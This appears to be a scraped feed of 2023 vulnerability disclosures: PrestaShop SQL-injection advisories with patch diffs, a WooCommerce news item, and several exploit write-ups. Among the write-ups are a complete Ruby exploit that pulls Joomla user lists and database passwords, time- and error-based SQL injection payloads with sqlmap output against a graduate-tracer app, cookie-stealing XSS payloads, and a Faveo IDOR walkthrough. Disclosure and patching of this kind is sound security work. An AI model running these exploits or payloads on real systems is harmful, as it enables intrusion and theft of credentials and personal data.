A vulnerability classified as problematic has been found in Arno0x TwoFactorAuth. This affects an unknown part of the file login/login.php. The manipulation of the argument from leads to open redirect. It is possible to initiate the attack remotely. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The name of the patch is 8549ad3cf197095f783643e41333586d6a4d0e54. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-223803.

CVE-2016-15030

SQL injection vulnerability found in PrestaShop smplredirectionsmanager v.1.1.19 and before allow a remote attacker to gain privileges via the SmplTools::getMatchingRedirectionsFromPartscomponent.

The module Redirections Manager (smplredirectionsmanager) from Smart Plugs contains a Blind SQL injection vulnerability up to version 1.1.19. This module is for the PrestaShop e-commerce platform.

WARNING : This vulnerability will bypass some WAF.

**Summary**

*   **CVE ID**: CVE-2023-26864
*   **Published at**: 2023-01-17
*   **Advisory source**: none
*   **Vendor**: PrestaShop
*   **Product**: smplredirectionsmanager
*   **Impacted release**: < 1.1.19 (1.1.19 fixed the vulnerability)
*   **Product author**: Smart Plugs
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

The method SmplTools::getMatchingRedirectionsFromParts() hold a sensitive SQL calls that can be executed with a trivial http call and exploited to forge a blind SQL injection.

The large scope of URL exposed to the vulnerability increases its severity and the risk that a pattern of URL is in whitelist of a WAF.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: none
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

This vulnerability permits altering the shop’s database.

**Patch of release 1.1.19**

    --- a/smplredirectionsmanager/classes/SmplTools.php
    +++ b/smplredirectionsmanager/classes/SmplTools.php
    @@ -104,10 +104,10 @@ class SmplTools
                         }
                     }
                     $contrainte_request_uri .= ($contrainte_request_uri ? ' OR' : '').' old_request_path="'.
    -                    pSQL(preg_replace('#\?.*#', '', $smpl_relative_uri)).'?'.$str_querystring.'"';
    +                    pSQL(preg_replace('#\?.*#', '', $smpl_relative_uri)).'?'.pSQL($str_querystring).'"';
                     foreach ($smpl_absolute_uris as $smpl_absolute_uri) {
                         $contrainte_request_uri .= ' OR old_request_path="'.
    -                        pSQL(preg_replace('#\?.*#', '', $smpl_absolute_uri)).'?'.$str_querystring.'"';
    +                        pSQL(preg_replace('#\?.*#', '', $smpl_absolute_uri)).'?'.pSQL($str_querystring).'"';
                     }
                 }
             } else {
    

**Timeline**

Date

Action

2022-10-10

Issue discovered by TouchWeb.fr’s auto-pentesting bots

2022-10-11

Contact the author

2022-11-14

Fix published on addons PrestaShop marketplace

2023-01-12

Request CVE ID

2023-01-17

Publish this security advisory

**Other recommandations**

*   It’s recommended to upgrade to the lastest version of the module **smplredirectionsmanager**.
*   Upgrade PrestaShop beyond 1.7.8.8 (and 8.0.1) to disable multiquery executions (separated by “;”).
*   Change the default database prefix ps_ by a new longer arbitrary prefix. Nethertheless, be warned that this is useless against blackhat with DBA senior skill because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against these set of rules.

**Links**

*   PrestaShop addons product page
*   National Vulnerability Database

CVE-2023-26864: [CVE-2023-26864] Blind SQL injection vulnerability in Redirections Manager (smplredirectionsmanager) PrestaShop module

Joomla! versions prior to 4.2.8 suffer from an unauthenticated information disclosure vulnerability.

    #!/usr/bin/env ruby# Exploit## Title: Joomla! < 4.2.8 - Unauthenticated information disclosure## Exploit author: noraj (Alexandre ZANNI) for ACCEIS (https://www.acceis.fr)## Author website: https://pwn.by/noraj/## Exploit source: https://github.com/Acceis/exploit-CVE-2023-23752## Date: 2023-03-24## Vendor Homepage: https://www.joomla.org/## Software Link: https://downloads.joomla.org/cms/joomla4/4-2-7/Joomla_4-2-7-Stable-Full_Package.tar.gz?format=gz## Version: 4.0.0 < 4.2.8 (it means from 4.0.0 up to 4.2.7)## Tested on: Joomla! Version 4.2.7## CVE : CVE-2023-23752# Vulnerability## Discoverer: Zewei Zhang from NSFOCUS TIANJI Lab## Date: 2023-02-24## Discoverer website: https://nsfocusglobal.com/company-overview/nsfocus-security-labs/## Title: Joomla Unauthorized Access## CVE: CVE-2023-23752## Patch: Update to >= 4.2.8## References:##   - https://nsfocusglobal.com/joomla-unauthorized-access-vulnerability-cve-2023-23752-notice/##   - https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html##   - https://attackerkb.com/topics/18qrh3PXIX/cve-2023-23752##   - https://nvd.nist.gov/vuln/detail/CVE-2023-23752##   - https://vulncheck.com/blog/joomla-for-rce##   - https://github.com/projectdiscovery/nuclei-templates/blob/main/cves/2023/CVE-2023-23752.yaml# standard libraryrequire 'json'# gemsrequire 'httpx'require 'docopt'require 'paint'doc = <<~DOCOPT  #{Paint['Joomla! < 4.2.8 - Unauthenticated information disclosure', :bold]}  #{Paint['Usage:', :red]}    #{__FILE__} <url> [options]    #{__FILE__} -h | --help  #{Paint['Parameters:', :red]}    <url>       Root URL (base path) including HTTP scheme, port and root folder  #{Paint['Options:', :red]}    --debug     Display arguments    --no-color  Disable colorized output (NO_COLOR environment variable is respected too)    -h, --help  Show this screen  #{Paint['Examples:', :red]}    #{__FILE__} http://127.0.0.1:4242    #{__FILE__} https://example.org/subdir  #{Paint['Project:', :red]}    #{Paint['author', :underline]} (https://pwn.by/noraj / https://twitter.com/noraj_rawsec)    #{Paint['company', :underline]} (https://www.acceis.fr / https://twitter.com/acceis)    #{Paint['source', :underline]} (https://github.com/Acceis/exploit-CVE-2023-23752)DOCOPTdef fetch_users(root_url, http)  vuln_url = "#{root_url}/api/index.php/v1/users?public=true"  http.get(vuln_url)enddef parse_users(root_url, http)  data_json = fetch_users(root_url, http)  data = JSON.parse(data_json)['data']  users = []  data.each do |user|    if user['type'] == 'users'      id = user['attributes']['id']      name = user['attributes']['name']      username = user['attributes']['username']      email = user['attributes']['email']      groups = user['attributes']['group_names']      users << {id: id, name: name, username: username, email: email, groups: groups}    end  end  usersenddef display_users(root_url, http)  users = parse_users(root_url, http)  puts Paint['Users', :red, :bold]  users.each do |u|    puts "[#{u[:id]}] #{u[:name]} (#{Paint[u[:username], :yellow]}) - #{u[:email]} - #{u[:groups]}"  endenddef fetch_config(root_url, http)  vuln_url = "#{root_url}/api/index.php/v1/config/application?public=true"  http.get(vuln_url)enddef parse_config(root_url, http)  data_json = fetch_config(root_url, http)  data = JSON.parse(data_json)['data']  config = {}  data.each do |entry|    if entry['type'] == 'application'      key = entry['attributes'].keys.first      config[key] = entry['attributes'][key]    end  end  configenddef display_config(root_url, http)  c = parse_config(root_url, http)  puts Paint['Site info', :red, :bold]  puts "Site name: #{c['sitename']}"  puts "Editor: #{c['editor']}"  puts "Captcha: #{c['captcha']}"  puts "Access: #{c['access']}"  puts "Debug status: #{c['debug']}"  puts  puts Paint['Database info', :red, :bold]  puts "DB type: #{c['dbtype']}"  puts "DB host: #{c['host']}"  puts "DB user: #{Paint[c['user'], :yellow, :bold]}"  puts "DB password: #{Paint[c['password'], :yellow, :bold]}"  puts "DB name: #{c['db']}"  puts "DB prefix: #{c['dbprefix']}"  puts "DB encryption #{c['dbencryption']}"endbegin  args = Docopt.docopt(doc)  Paint.mode = 0 if args['--no-color']  puts args if args['--debug']  http = HTTPX  display_users(args['<url>'], http)  puts  display_config(args['<url>'], http)rescue Docopt::Exit => e  puts e.messageend

Joomla! 4.2.7 Unauthenticated Information Disclosure

Online Graduate Tracer System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Online Graduate Tracer System - Multiple SQLi# Date: 24/03/2023# Exploit Author: Abdulhakim Öner# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/15904/online-graduate-tracer-system-college-ict-alumni.html# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/tracking.zip# Version: 1.0# Tested on: Windows, Linux## Description A Blind SQL injection vulnerability in the fill-in forms of Online Graduate Tracer System allows remote unauthenticated attackers to execute remote arbitrary SQL commands through "age" parameter. ## Request PoC```POST /tracking/ HTTP/1.1Host: 192.168.1.100Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.100/tracking/Content-Type: application/x-www-form-urlencodedContent-Length: 666fullname=TKeljbcD&age=24'&sex=&dob=11%2f11%2f1992&cs=&religion=&street=518287&barangay=933877&municipal=149726&province=293419&region=&zipcode=21788&country=767093&course=&batch=&facebook=329348&twitter=488487&phonenumber=197-436-9799&email=dKYxqIen@burpcollaborator.net&estatus=Employed&organization=&profession=503409&type=Working+Fulltime&location=local&location=abroad&status=Permanent&status=Contractual&status=Casual&status=Others&number=1-5+yrs&income=359935&relate=Yes&sreason=621051&nature=792251&company=597673&num=0-5+yrs&num=6-10+yrs&num=10-15+yrs&num=16+yrs+above&mincome=325978&reason=992014&consider=Yes&submit=```This request causes a Fatal error. Adding "'%2b(select*from(select(sleep(10)))a)%2b'" to the end of "age" parameter, the response to request was 200 status code with message of OK, but 20 seconds later, which indicates that our sleep 10 command works. ```POST /tracking/ HTTP/1.1Host: 192.168.1.100Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.100/tracking/Content-Type: application/x-www-form-urlencodedContent-Length: 666fullname=TKeljbcD&age=24'%2b(select*from(select(sleep(10)))a)%2b'&sex=&dob=11%2f11%2f1992&cs=&religion=&street=518287&barangay=933877&municipal=149726&province=293419&region=&zipcode=21788&country=767093&course=&batch=&facebook=329348&twitter=488487&phonenumber=197-436-9799&email=dKYxqIen@burpcollaborator.net&estatus=Employed&organization=&profession=503409&type=Working+Fulltime&location=local&location=abroad&status=Permanent&status=Contractual&status=Casual&status=Others&number=1-5+yrs&income=359935&relate=Yes&sreason=621051&nature=792251&company=597673&num=0-5+yrs&num=6-10+yrs&num=10-15+yrs&num=16+yrs+above&mincome=325978&reason=992014&consider=Yes&submit=```## Exploit with sqlmapSave the request from burp to file ```┌──(root㉿caesar)-[/home/kali/Workstation/sts]└─# sqlmap -r sqli.txt -p 'age' --batch --dbs --level=3 --risk=2---snip---[01:53:49] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'POST parameter 'age' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Nsqlmap identified the following injection point(s) with a total of 630 HTTP(s) requests:---Parameter: age (POST)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: fullname=TKeljbcD&age=24' RLIKE (SELECT (CASE WHEN (6534=6534) THEN 24 ELSE 0x28 END)) AND 'ATRa'='ATRa&sex=&dob=11/11/1992&cs=&religion=&street=518287&barangay=933877&municipal=149726&province=293419&region=&zipcode=21788&country=767093&course=&batch=&facebook=329348&twitter=488487&phonenumber=197-436-9799&email=dKYxqIen@burpcollaborator.net&estatus=Employed&organization=&profession=503409&type=Working Fulltime&location=local&location=abroad&status=Permanent&status=Contractual&status=Casual&status=Others&number=1-5 yrs&income=359935&relate=Yes&sreason=621051&nature=792251&company=597673&num=0-5 yrs&num=6-10 yrs&num=10-15 yrs&num=16 yrs above&mincome=325978&reason=992014&consider=Yes&submit=    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: fullname=TKeljbcD&age=24' AND (SELECT 9933 FROM(SELECT COUNT(*),CONCAT(0x7170716271,(SELECT (ELT(9933=9933,1))),0x7178767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'PwMK'='PwMK&sex=&dob=11/11/1992&cs=&religion=&street=518287&barangay=933877&municipal=149726&province=293419&region=&zipcode=21788&country=767093&course=&batch=&facebook=329348&twitter=488487&phonenumber=197-436-9799&email=dKYxqIen@burpcollaborator.net&estatus=Employed&organization=&profession=503409&type=Working Fulltime&location=local&location=abroad&status=Permanent&status=Contractual&status=Casual&status=Others&number=1-5 yrs&income=359935&relate=Yes&sreason=621051&nature=792251&company=597673&num=0-5 yrs&num=6-10 yrs&num=10-15 yrs&num=16 yrs above&mincome=325978&reason=992014&consider=Yes&submit=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: fullname=TKeljbcD&age=24' AND (SELECT 7274 FROM (SELECT(SLEEP(5)))gxIn) AND 'maqj'='maqj&sex=&dob=11/11/1992&cs=&religion=&street=518287&barangay=933877&municipal=149726&province=293419&region=&zipcode=21788&country=767093&course=&batch=&facebook=329348&twitter=488487&phonenumber=197-436-9799&email=dKYxqIen@burpcollaborator.net&estatus=Employed&organization=&profession=503409&type=Working Fulltime&location=local&location=abroad&status=Permanent&status=Contractual&status=Casual&status=Others&number=1-5 yrs&income=359935&relate=Yes&sreason=621051&nature=792251&company=597673&num=0-5 yrs&num=6-10 yrs&num=10-15 yrs&num=16 yrs above&mincome=325978&reason=992014&consider=Yes&submit=---[01:53:50] [INFO] the back-end DBMS is MySQLweb application technology: PHP 8.2.0, Apache 2.4.54back-end DBMS: MySQL >= 5.0 (MariaDB fork)---snip---```## The "barangay", "batch", "company", "country", "course", "cs", "dob", "email", "estatus", "facebook", "fullname", "income", "location", "mincome", "municipal", "nature", "number", "organization", "phonenumber", "profession", "province", "region", "relate", "religion", "sex", "sreason", "status", "street", "twitter", "type" and "zipcode" parameters in the POST requests are also vulnerable. They can be exploited in the same way.

Online Graduate Tracer System 1.0 SQL Injection

Sales Tracker Management System version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Sales Tracker Management System - Cross Site Scripting Vulnerability (Authenticated)# Date: 23/03/2023# Exploit Author: Abdulhakim Öner# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/16061/sales-tracker-management-system-using-php-free-source-code.html# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-sts_0.zip# Version: 1.0# Tested on: Windows, Linux## Description A reflected Cross Site Scripting vulnerability in the "page" parameter in Sales Tracker Management System allows remote authenticated users to execute JavaScript code. ## Request PoC```GET /php-sts/admin/?page=clients'%3balert(document.cookie)%2f%2f HTTP/1.1Host: 192.168.1.100Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.100/php-sts/admin/Cookie: PHPSESSID=n0brm8te79kaf0nvf7d1hvs6rm```

Sales Tracker Management System 1.0 Cross Site Scripting

Faveo 5.0.1 allows remote attackers to obtain sensitive information via a modified user ID in an Insecure Direct Object Reference (IDOR) attack.

Whats is Faveo?

**Faveo** is an ticket based support system built on the PHP based Laravel framework. The word Faveo comes from Latin, and means “to be favourable”. It provides businesses with an automated helpdesk system to manage customer support. It has an inbuilt knowledge base for self-service by the customer.

This vulnerability on version **Stable ServiceDesk Enterprise(v5.0.1)  
**The vulnerability has been fixed in v6.0.3

Let’s demonstrate the first vulnerability that was found:

**IDOR - Insecure direct object references**

This test uses the test user provided by the **demo\_client** platform itself:

After authenticating on the application by going to my profile and then profile we can see the requests via Burp Suite.

Intercepting the requests we can see the first thing that caught my attention, we can see that our user Demo is referenced by the number 21 as per the printout below, the other parameters will also be of help for the next vulnerability.

My user Demo:

By interchanging the request again and changing the ID to another number we are able to get the personal data of other users registered in the system.

Result of the request manipulating the user ID:

**Broken Access Control**

To contextualize this failure, first we need to understand that within the platform each user or agent is registered within groups where each one can only view the tickets relevant to their access

According to the print below, we can see that going to my tickets, our customer user has 4 open tickets and two closed tickets.

Going back to my profile and intercepting the burp request I managed to gain unauthorized access as shown below:

In the request to access our profile, if we removed the **client** from the panel, we were able to obtain access that only the system administrator could have and we were able to include ourselves in other **organizations** and read all the tickets in the system, even though we were an ordinary user.

By removing the **client**, we can view our user’s **work phone**, **email** and **mobile phone**, and if we change the **userid** of the request, we can also obtain this data from any user on the platform.

Result by changing the **user id** and removing the **client** from the request:

We were able to view the personal data of the **Aston** user and the **organization** he is part of within the system.

Returning to our demo user, we were able to include ourselves in all the organizations available in the system:

After selecting the organizations just click on submit:

Changes made successfully

Returning to my tickets now, we can see 25 open and 6 closed tickets where we can read all tickets from other organizations proving the failure.

CVE-2023-24625: CVE-2023–24625 / IDOR in Faveo Service Desk - cupc4k3 - Medium

SourceCodester Loan Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Type parameter under the Edit Loan Types module.

**Loan-Management-System v1.0 by itsourcecode.com has Cross-site Scripting (XSS)**

Vul\_Author: Kai Wang

Login Account:admin Password:admin123

vendors: https://itsourcecode.com/free-projects/php-project/loan-management-system-project-in-php-with-source-code/

Vulnerability File: /Loan/ajax.php

Vulnerability location: /Loan/ajax.php?action=save\_loan\_type HTTP/1.1

\[+\] Payload: <script>alert(1)</script>

Tested on Windows 10, phpStudy

There is an example with alert:

    POST /Loan/ajax.php?action=save_loan_type HTTP/1.1
    Host: 10.12.180.79
    Content-Length: 362
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.41
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl0Dh1LXu5fRCTYLI
    Origin: http://10.12.180.79
    Referer: http://10.12.180.79/Loan/index.php?page=loan_type
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
    Cookie: PHPSESSID=d4me9tekbcuef2k8k1qupv9i0t
    Connection: close
    
    ------WebKitFormBoundaryl0Dh1LXu5fRCTYLI
    Content-Disposition: form-data; name="id"
    
    
    ------WebKitFormBoundaryl0Dh1LXu5fRCTYLI
    Content-Disposition: form-data; name="type_name"
    
    <script>alert(1)</script>
    ------WebKitFormBoundaryl0Dh1LXu5fRCTYLI
    Content-Disposition: form-data; name="description"
    
    test loans
    ------WebKitFormBoundaryl0Dh1LXu5fRCTYLI--
    

Get into the Loan Types page,click the edit button as shown in the image

input a XSS script in the 'Type' input box

click save and you will see an alert

CVE-2023-27242: Loan-Management-System/README.md at main · kaikai-11/Loan-Management-System

Patches have been released for a critical security flaw impacting the WooCommerce Payments plugin for WordPress, which is installed on over 500,000 websites.
The flaw, if left unresolved, could enable a bad actor to gain unauthorized admin access to impacted stores, the company said in an advisory on March 23, 2023. It impacts versions 4.8.0 through 5.6.1.
Put differently, the issue could permit

Patches have been released for a critical security flaw impacting the WooCommerce Payments plugin for WordPress, which is installed on over 500,000 websites.

The flaw, if left unresolved, could enable a bad actor to gain unauthorized admin access to impacted stores, the company said in an advisory on March 23, 2023. It impacts versions 4.8.0 through 5.6.1.

Put differently, the issue could permit an "unauthenticated attacker to impersonate an administrator and completely take over a website without any user interaction or social engineering required," WordPress security company Wordfence said.

The vulnerability appears to reside in a PHP file called "class-platform-checkout-session.php," Sucuri researcher Ben Martin noted.

Credited with discovering and reporting the vulnerability is Michael Mazzolini of Swiss penetration testing company GoldNetwork.

WooCommerce also said it worked with WordPress to auto-update sites using affected versions of the software. Patched versions include 4.8.2, 4.9.1, 5.0.4, 5.1.3, 5.2.2, 5.3.1, 5.4.1, 5.5.2, and 5.6.2.

WEBINAR

Discover the Hidden Dangers of Third-Party SaaS Apps

Are you aware of the risks associated with third-party app access to your company's SaaS apps? Join our webinar to learn about the types of permissions being granted and how to minimize risk.

RESERVE YOUR SEAT

Furthermore, the maintainers of the e-commerce plugin noted that it's disabling the WooPay beta program owing to concerns that the security defect has the potential to impact the payment checkout service.

There is no evidence that the vulnerability has been actively exploited to date, but it's expected to be weaponized on a large scale once a proof-of-concept becomes available, Wordfence researcher Ram Gall cautioned.

Besides updating to the latest version, users are recommended to check for newly added admin users, and if so, change all administrator passwords and rotate payment gateway and WooCommerce API keys.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Critical WooCommerce Payments Plugin Flaw Patched for 500,000+ WordPress Sites

PrestaShop jmsblog 2.5.5 was discovered to contain a SQL injection vulnerability.

The module Jms Blog (jmsblog) from Joommasters contains a Blind SQL injection vulnerability. This module is for the PrestaShop e-commerce platform and mainly provided with joo masters PrestaShop themes

**Summary**

*   **CVE ID**: CVE-2023-27034
*   **Published at**: 2023-03-13
*   **Advisory source**: none
*   **Vendor**: PrestaShop
*   **Product**: jmsblog
*   **Impacted release**: at least 2.5.5 and 2.5.6
*   **Product author**: Joommasters
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

Several front controller in /controllers/front/ hold sensitives SQL calls that can be executed with a trivial http call and exploited to forge a blind SQL injection.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: none
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Technical and personal data leaks
*   Obtain admin access
*   Remove all data of the linked PrestaShop
*   Display sensitives tables to front-office to unlock potential admin’s ajax scripts of modules protected by token on the ecosystem

**Patch**

    --- a/controllers/front/archive.php
    +++ b/controllers/front/archive.php
    @@ -55,1 +55,1 @@ function getPosts
    -            ' AND DATE_FORMAT(hss.created,"%Y-%m") LIKE "%'.$_month.'%"
    +            ' AND DATE_FORMAT(hss.created,"%Y-%m") LIKE "%'.pSQL($_month).'%"
    

    --- a/controllers/front/post.php
    +++ b/controllers/front/post.php
    @@ -85,1 +85,1 @@ function getPosts
    -                WHERE pc.`email` = \''.$email.'\'
    +                WHERE pc.`email` = \''.pSQL($email).'\'
    

    --- a/controllers/front/tag.php
    +++ b/controllers/front/tag.php
    @@ -53,1 +53,1 @@ function getPosts
    -            ' AND hssl.`tags` LIKE "%'.$tag.'%"
    +            ' AND hssl.`tags` LIKE "%'.pSQL($tag).'%"
    

**Timeline**

Date

Action

2022-09-01

Issue discovered during a pentest

2023-02-17

Contact the author

2023-03-13

Publish this security advisory

2023-03-16

CVE ID affected

**Other recommandations**

*   Upgrade PrestaShop beyond 1.7.8.8 (and 8.0.1) to disable multiquery executions (separated by “;”).
*   Change the default database prefix ps_ by a new longer arbitrary prefix. Nethertheless, be warned that this is useless against blackhat with DBA senior skill because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against these set of rules.

**Links**

*   Joom masters web site
*   National Vulnerability Database

CVE-2023-27034: Blind SQL injection vulnerability in Jms Blog (jmsblog) PrestaShop module

NotrinosERP v0.7 was discovered to contain a SQL injection vulnerability via the OrderNumber parameter at `/NotrinosERP/sales/customer_delivery.php`.

**NotrinosERP vulnerable to SQL Injection**

High severity GitHub Reviewed Published Mar 23, 2023 to the GitHub Advisory Database • Updated Mar 23, 2023

Tag

#php